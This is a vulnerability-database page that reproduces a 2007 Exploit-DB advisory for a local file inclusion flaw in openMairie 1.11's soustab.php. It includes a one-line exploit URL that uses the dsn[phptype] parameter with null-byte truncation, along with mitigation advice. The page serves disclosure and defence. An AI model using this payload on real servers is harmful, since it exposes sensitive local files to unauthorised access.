header-logo
Suggest Exploit
vendor:
openMairie
by:
GolD_M = [Mahmood_ali]
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: openMairie
Affected Version From: 1.11
Affected Version To: 1.11
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

openMairie 1.11(/scr/soustab.php)Local File Inclusion Vulnerabilitiy

The vulnerability allows an attacker to include local files by manipulating the 'dsn[phptype]' parameter in the 'soustab.php' script. The attacker can specify the path of the file to be included, resulting in unauthorized access to sensitive information.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and validate the file paths before including them in the script.
Source

Exploit-DB raw data:

# openMairie 1.11(/scr/soustab.php)Local File Inclusion Vulnerabilitiy
# D.Script: http://adullact.net/frs/download.php/1302/openmairie_exemple_1.11.zip 
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://Www.Tryag.Com/cc
# Exploit:[Path]/scr/soustab.php?dsn[phptype]=[ Local File ]%00
# Greetz To: Tryag.Com/cc & Dwrat.Com & Asb-May.Net/bb

# milw0rm.com [2007-04-16]

Navigation

Suggest Exploit

Services By CQR